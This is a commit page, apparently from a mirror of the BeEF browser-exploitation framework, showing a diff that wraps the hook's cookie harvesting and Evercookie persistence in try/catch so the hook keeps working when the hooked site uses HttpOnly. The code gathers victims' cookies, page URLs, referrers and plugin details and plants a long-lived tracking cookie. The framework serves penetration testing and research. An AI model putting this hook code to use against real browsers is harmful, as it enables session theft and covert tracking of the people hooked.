Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Patched BeEF hook core to support injection when the hooked domain uses HttpOnly.

Browse Source
This commit is contained in:
antisnatchor
2013-02-18 17:19:49 +00:00
parent 5e257d4e33
commit c222d0e4e3
2 changed files with 27 additions and 14 deletions
Download Patch File Download Diff File Expand all files Collapse all files

20
core/main/client/browser.js
View File

@@ -2101,7 +2101,6 @@ beef.browser = {
var browser_name = beef.browser.getBrowserName();
var browser_version = beef.browser.getBrowserVersion();
var browser_reported_name = beef.browser.getBrowserReportedName();
var cookies = document.cookie;
var page_title = (document.title) ? document.title : "Unknown";
var page_uri = document.location.href;
var page_referrer = (document.referrer) ? document.referrer : "Unknown";
@@ -2129,13 +2128,24 @@ beef.browser = {
var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
try{
var cookies = document.cookie;
var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
if (cookies) details["Cookies"] = cookies;
if (has_session_cookies) details["hasSessionCookies"] = has_session_cookies;
if (has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies;
}catch(e){
// the hooked domain is using HttpOnly. EverCookie is persisting the BeEF hook in a different way,
// and there is no reason to read cookies at this point
details["Cookies"] = "Cookies can't be read. The hooked domain is most probably using HttpOnly.";
details["hasSessionCookies"] = "No";
details["hasPersistentCookies"] = "No";
}
if (browser_name) details["BrowserName"] = browser_name;
if (browser_version) details["BrowserVersion"] = browser_version;
if (browser_reported_name) details["BrowserReportedName"] = browser_reported_name;
if (cookies) details["Cookies"] = cookies;
if (page_title) details["PageTitle"] = page_title;
if (page_uri) details["PageURI"] = page_uri;
if (page_referrer) details["PageReferrer"] = page_referrer;
@@ -2161,8 +2171,6 @@ beef.browser = {
if (has_silverlight) details['HasSilverlight'] = has_silverlight;
if (has_quicktime) details['HasQuickTime'] = has_quicktime;
if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
if (has_session_cookies) details["hasSessionCookies"] = has_session_cookies;
if (has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies;
return details;
},

21
core/main/client/lib/evercookie.js
View File

@@ -793,14 +793,19 @@ this.waitForSwf = function(i)
this.evercookie_cookie = function(name, value)
{
if (typeof(value) != "undefined")
{
// expire the cookie first
document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
}
else
return this.getFromStr(name, document.cookie);
try{
if (typeof(value) != "undefined")
{
// expire the cookie first
document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
}
else
return this.getFromStr(name, document.cookie);
}catch(e){
// the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
// evercookie_userdata and evercookie_window will be used in this case.
}
};
// get value from param-like string (eg, "x=y&name=VALUE")